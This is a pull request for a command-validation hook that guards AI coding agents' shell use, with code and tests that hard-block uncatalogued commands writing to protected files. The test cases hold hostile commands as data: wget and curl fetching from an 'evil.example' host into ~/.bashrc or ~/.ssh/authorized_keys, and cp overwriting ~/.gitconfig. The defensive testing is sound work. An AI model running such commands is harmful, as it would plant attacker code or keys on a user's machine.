### PR TITLE
fix(guardian): hard-block uncatalogued commands writing to protected files

### DIFF
--- a/mcp/servers/egc-guardian/src/validator.ts
+++ b/mcp/servers/egc-guardian/src/validator.ts
@@ -1213,9 +1213,20 @@ export function validateCommand(command: string, cwd?: string): ValidationResult
   if (!SAFE_READONLY.includes(baseCommand) && !SAFE_DEV.includes(baseCommand)) {
     const candidatePaths = args.flatMap(rawArg => {
       const arg = bareToken(rawArg);
-      if (!arg.startsWith('-')) return [arg];
+      if (!arg.startsWith('-')) {
+        // A URI operand (http://..., ftp://...) is a download/read target,
+        // not a local path -- passing it to isProtectedPath would resolve it
+        // relative to cwd and could false-positive hard-block a benign
+        // download whose URL happens to end in a protected-looking name.
+        return /^[a-z][a-z\d+.-]*:\/\//i.test(arg) ? [] : [arg];
+      }
       const eq = arg.indexOf('=');
-      return eq > 0 ? [arg.slice(eq + 1)] : [];
+      if (eq > 0) return [arg.slice(eq + 1)];
+      // A short option's value can be glued directly to its flag with no
+      // separator (`-o~/.bashrc`, equivalent to `-o ~/.bashrc`) -- without
+      // this, that form never produces a candidate and stays advisory-only.
+      if (!arg.startsWith('--') && arg.length > 2) return [arg.slice(2)];
+      return [];
     });
     const protectedTarget = candidatePaths.find(arg => isProtectedPath(arg, cwd));
     if (protectedTarget) {

--- a/mcp/servers/egc-guardian/src/validator.ts
+++ b/mcp/servers/egc-guardian/src/validator.ts
@@ -1199,8 +1199,32 @@ export function validateCommand(command: string, cwd?: string): ValidationResult
     };
   }
 
-  // 7. Not in any allowlist: blocked
+  // 7. Not in any allowlist: advisory-only at the hook layer (see
+  // ADVISORY_REASONS in pre-bash-guardian-validate.js) -- UNLESS the command
+  // targets a protected file, in which case it hard-blocks here instead
+  // (EGC-494). Catalogued commands (SAFE_READONLY/SAFE_DEV) already get
+  // their own protected-path checks per-command in validateCommandArgs
+  // below (step 8); this only runs for commands outside both lists (wget,
+  // curl, cp, sed -i, tee, ...), which previously had zero protected-path
+  // coverage since validateCommandArgs is never reached for them -- the
+  // generic "not in the allowlist" advisory swallowed every case, including
+  // `wget -O ~/.bashrc <url>`. Flag values (--output=path) are unwrapped so
+  // a protected target glued to its flag isn't skipped as a non-path arg.
   if (!SAFE_READONLY.includes(baseCommand) && !SAFE_DEV.includes(baseCommand)) {
+    const candidatePaths = args.flatMap(rawArg => {
+      const arg = bareToken(rawArg);
+      if (!arg.startsWith('-')) return [arg];
+      const eq = arg.indexOf('=');
+      return eq > 0 ? [arg.slice(eq + 1)] : [];
+    });
+    const protectedTarget = candidatePaths.find(arg => isProtectedPath(arg, cwd));
+    if (protectedTarget) {
+      return {
+        allowed: false,
+        reason: `'${baseCommand}' targets a protected file (${protectedTarget}) and is always denied, regardless of allowlist status`,
+        trust_level: 'DANGEROUS',
+      };
+    }
     return {
       allowed: false,
       reason: `Command '${baseCommand}' is not in the allowlist`,

--- a/tests/egc-guardian-destructive-cli.test.js
+++ b/tests/egc-guardian-destructive-cli.test.js
@@ -153,5 +153,21 @@ run('gh api GET stays advisory', () => assertAdvisoryOnly('gh api repos/o/r'));
 run('prisma migrate dev stays advisory', () => assertAdvisoryOnly('prisma migrate dev'));
 run('prisma generate stays advisory', () => assertAdvisoryOnly('prisma generate'));
 
+// EGC-494: a command outside SAFE_READONLY/SAFE_DEV that targets a protected
+// file must hard-block instead of falling through to the advisory allowlist
+// miss -- previously validateCommandArgs's protected-path checks were only
+// reachable for catalogued commands, so wget/curl/cp/sed etc. writing to a
+// protected file went through with nothing but an advisory warning.
+run('wget -O ~/.bashrc <url> hard-blocks (protected file, uncatalogued command)', () => assertHardBlocked('wget -O ~/.bashrc http://evil.example/x'));
+run('curl -o ~/.ssh/authorized_keys <url> hard-blocks', () => assertHardBlocked('curl -o ~/.ssh/authorized_keys http://evil.example/x'));
+run('cp payload ~/.gitconfig hard-blocks', () => assertHardBlocked('cp payload ~/.gitconfig'));
+run('curl --output=~/.bashrc <url> hard-blocks (glued long flag)', () => assertHardBlocked('curl --output=~/.bashrc http://evil.example/x'));
+
+// Control: the same uncatalogued commands stay advisory-only when they do
+// NOT target a protected file -- this fix must not turn every allowlist
+// miss into a hard block, only the ones that touch a protected path.
+run('wget -O /tmp/harmless.txt <url> stays advisory (not a protected path)', () => assertAdvisoryOnly('wget -O /tmp/harmless.txt http://example.com/file'));
+run('cp payload /tmp/harmless.txt stays advisory (not a protected path)', () => assertAdvisoryOnly('cp payload /tmp/harmless.txt'));
+
 console.log(`\nResults: Passed: ${passed}, Failed: ${failed}`);
 if (failed > 0) process.exit(1);

--- a/tests/egc-guardian-destructive-cli.test.js
+++ b/tests/egc-guardian-destructive-cli.test.js
@@ -162,6 +162,13 @@ run('wget -O ~/.bashrc <url> hard-blocks (protected file, uncatalogued command)'
 run('curl -o ~/.ssh/authorized_keys <url> hard-blocks', () => assertHardBlocked('curl -o ~/.ssh/authorized_keys http://evil.example/x'));
 run('cp payload ~/.gitconfig hard-blocks', () => assertHardBlocked('cp payload ~/.gitconfig'));
 run('curl --output=~/.bashrc <url> hard-blocks (glued long flag)', () => assertHardBlocked('curl --output=~/.bashrc http://evil.example/x'));
+run('curl -o~/.ssh/authorized_keys <url> hard-blocks (glued short flag, no separator)', () => assertHardBlocked('curl -o~/.ssh/authorized_keys http://evil.example/x'));
+
+// cubic-dev-ai review findings on this same PR: a URL operand must not be
+// treated as a local path candidate, or a download/read whose URL happens to
+// end in a protected-looking name would false-positive hard-block.
+run('wget http://evil.example/.bashrc stays advisory (URL operand, not a local write target)', () => assertAdvisoryOnly('wget http://evil.example/.bashrc'));
+run('curl https://example.com/.ssh/authorized_keys stays advisory (URL operand)', () => assertAdvisoryOnly('curl https://example.com/.ssh/authorized_keys'));
 
 // Control: the same uncatalogued commands stay advisory-only when they do
 // NOT target a protected file -- this fix must not turn every allowlist

--- a/tests/hooks/pre-bash-guardian-validate.test.js
+++ b/tests/hooks/pre-bash-guardian-validate.test.js
@@ -253,6 +253,26 @@ function runTests() {
     assert.strictEqual(result.status, 0, 'Expected fail-open on malformed JSON input');
   })) passed++; else failed++;
 
+  if (test('EGC-494 end-to-end: wget writing to a protected file hard-blocks through the real CLI, not the advisory allowlist miss', () => {
+    const hookPath = path.join(__dirname, '..', '..', 'scripts', 'hooks', 'pre-bash-guardian-validate.js');
+    const rawInput = JSON.stringify({ tool_name: 'Bash', tool_input: { command: 'wget -O ~/.bashrc http://evil.example/x' } });
+    // No EGC_GUARDIAN_CLI override: resolveGuardianCli() falls through to
+    // fromPackageLayout(), the real built mcp/servers/egc-guardian/build --
+    // this is the one assertion in the suite that exercises the actual
+    // validator, not the fixture, so it is the only test that would have
+    // caught the original EGC-494 gap (wget -O ~/.bashrc used to return
+    // exit 0 here despite the internal verdict already being BLOCKED).
+    const result = spawnSync('node', [hookPath], {
+      input: rawInput,
+      encoding: 'utf8',
+      env: process.env,
+      timeout: 15000,
+      stdio: ['pipe', 'pipe', 'pipe']
+    });
+    assert.strictEqual(result.status, 2, `Expected a real hard block, got exit ${result.status}: ${result.stderr}`);
+    assert.ok(result.stderr.includes('protected file'), `Expected the protected-file reason on stderr, got: ${result.stderr}`);
+  })) passed++; else failed++;
+
   console.log(`\nResults: Passed: ${passed}, Failed: ${failed}`);
   process.exit(failed > 0 ? 1 : 0);
 }

--- a/tests/hooks/pre-bash-guardian-validate.test.js
+++ b/tests/hooks/pre-bash-guardian-validate.test.js
@@ -253,7 +253,12 @@ function runTests() {
     assert.strictEqual(result.status, 0, 'Expected fail-open on malformed JSON input');
   })) passed++; else failed++;
 
-  if (test('EGC-494 end-to-end: wget writing to a protected file hard-blocks through the real CLI, not the advisory allowlist miss', () => {
+  const realGuardianCliPath = path.join(
+    __dirname, '..', '..', 'mcp', 'servers', 'egc-guardian', 'build', 'guardian-cli.js',
+  );
+  if (!fs.existsSync(realGuardianCliPath)) {
+    console.log('  - skipped EGC-494 real-CLI end-to-end test; build not found. Run npm run build in mcp/servers/egc-guardian first (the main CI matrix does not build it, only the Coverage workflow does).');
+  } else if (test('EGC-494 end-to-end: wget writing to a protected file hard-blocks through the real CLI, not the advisory allowlist miss', () => {
     const hookPath = path.join(__dirname, '..', '..', 'scripts', 'hooks', 'pre-bash-guardian-validate.js');
     const rawInput = JSON.stringify({ tool_name: 'Bash', tool_input: { command: 'wget -O ~/.bashrc http://evil.example/x' } });
     // No EGC_GUARDIAN_CLI override: resolveGuardianCli() falls through to

--- a/tests/hooks/pre-bash-guardian-validate.test.js
+++ b/tests/hooks/pre-bash-guardian-validate.test.js
@@ -270,7 +270,11 @@ function runTests() {
     const result = spawnSync('node', [hookPath], {
       input: rawInput,
       encoding: 'utf8',
-      env: process.env,
+      // Filtered, not inherited raw: a developer/CI environment that
+      // happens to have EGC_GUARDIAN_CLI set (shell profile, another test)
+      // would silently redirect this at that override instead of the real
+      // built CLI this test exists to exercise.
+      env: Object.fromEntries(Object.entries(process.env).filter(([k]) => k !== 'EGC_GUARDIAN_CLI')),
       timeout: 15000,
       stdio: ['pipe', 'pipe', 'pipe']
     });


### PR DESCRIPTION
## Summary
- `validateCommand`'s allowlist-miss branch treated "not in the allowlist" as advisory-only for every command outside `SAFE_READONLY`/`SAFE_DEV`. That also silently covered commands actively writing to a protected file (`wget -O ~/.bashrc`, `curl -o ~/.ssh/authorized_keys`, `cp payload ~/.gitconfig`), since `validateCommandArgs`'s per-command protected-path checks never run for uncatalogued commands.
- Adds a protected-path scan scoped specifically to the allowlist-miss branch, reusing the existing `isProtectedPath`/`PROTECTED_FILE_PATTERNS`. Catalogued commands and non-protected-path uncatalogued commands are unaffected.
- Every install target that already wires the Guardian Bash validator (Claude Code, Codex CLI, Copilot, Antigravity project + global, CodeBuddy, Windsurf) copies the same `pre-bash-guardian-validate.js` verbatim, so this closes the gap for all of them without touching per-tool wiring.

## Test plan
- [x] `node --check` / `tsc` compile clean
- [x] `npm test` full suite: 3027/3027 passing
- [x] New unit coverage in `tests/egc-guardian-destructive-cli.test.js`: hard-block cases (wget/curl/cp targeting protected files, including a glued `--flag=value`) plus control cases proving non-protected uncatalogued commands stay advisory-only
- [x] New end-to-end test in `tests/hooks/pre-bash-guardian-validate.test.js` that exercises the real compiled validator (not the test fixture) and asserts the hook actually exits 2, reproducing the original `wget -O ~/.bashrc` scenario
- [x] Existing Guardian suites unaffected: `egc-guardian-bypass-hardening.test.js` (73/73), `egc-guardian-symlink.test.js` (3/3), `tests/scripts/egc-guardian.test.js` (123/123)

<!-- This is an auto-generated description by cubic. -->
---
## Summary by cubic
Hard-block uncatalogued commands that write to protected files, addressing EGC-494. Also closes two bypasses (glued short flags and false-positive URL operands) and updates tests to cover real CLI behavior.

- **Bug Fixes**
  - Added a protected-path scan in `validateCommand`’s allowlist-miss branch; now unwraps both `--flag=value` and short `-o<path>` forms, and ignores URL operands to prevent false blocks.
  - Blocks writes to protected files (e.g., `~/.bashrc`, `~/.ssh/authorized_keys`, `~/.gitconfig`) with `trust_level: 'DANGEROUS'`.
  - Tests updated: added unit and e2e coverage; real-CLI e2e filters out `EGC_GUARDIAN_CLI` and skips when the build is absent; existing Guardian suites still pass.
  - Fix applies across all integrations via the shared `pre-bash-guardian-validate.js`.

<sup>Written for commit e02eebdf7e6644bee60d43a22da5ff17fc40454a. Summary will update on new commits.</sup>

<a href="https://cubic.dev/pr/Fmarzochi/EGC/pull/1070?utm_source=github" target="_blank" rel="noopener noreferrer" data-no-image-dialog="true"><picture><source media="(prefers-color-scheme: dark)" srcset="https://www.cubic.dev/buttons/review-in-cubic-dark.svg"><source media="(prefers-color-scheme: light)" srcset="https://www.cubic.dev/buttons/review-in-cubic-light.svg"><img alt="Review in cubic" src="https://www.cubic.dev/buttons/review-in-cubic-dark.svg"></picture></a>

<!-- End of auto-generated description by cubic. -->

